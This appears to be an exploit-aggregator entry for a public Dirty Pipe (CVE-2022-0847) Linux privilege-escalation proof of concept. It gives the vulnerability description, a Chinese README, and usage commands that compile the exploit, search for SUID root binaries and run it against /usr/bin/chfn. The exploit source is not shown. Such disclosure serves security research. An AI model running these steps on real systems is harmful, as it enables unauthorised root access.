CVE-2022-0847 PoC — Linux kernel 安全漏洞

Source

https://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit

Associated Vulnerability

Title:Linux kernel 安全漏洞 (CVE-2022-0847)
Description:A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.

Description

CVE-2022-0847-DirtyPipe-Exploit

Readme

# CVE-2022-0847-DirtyPipe

## 漏洞简介
3 月 7 日，国外的安全研究员 Max Kellermann 发布博客，披露了一处存在于Linux 内核中的本地提权漏洞 CVE-2022-0847：
https://dirtypipe.cm4all.com/

CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞，可覆盖重写任意可读文件中的数据，从而可将普通权限的用户提升到特权 root。

CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞（Dirty Cow），但它更容易被利用。漏洞作者将此漏洞命名为"Dirty Pipe"。

## EXP使用
Link: https://haxx.in/files/dirtypipez.c  
Author: Max Kellermann <max.kellermann@ionos.com>

```
gcc -o exp exploit.c
./exp +x ./exp

# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

./exp /usr/bin/chfn
```

![](media/16469174215294/16469193729339.jpg)

File Snapshot


 [4.0K]  /data/pocs/7c76e33bbdf3589f7c0695f1d151401097f2dc3c
├── [7.2K]  exploit.c
├── [4.0K]  media
│   └── [4.0K]  16469174215294
│       └── [410K]  16469193729339.jpg
└── [ 980]  README.md

2 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!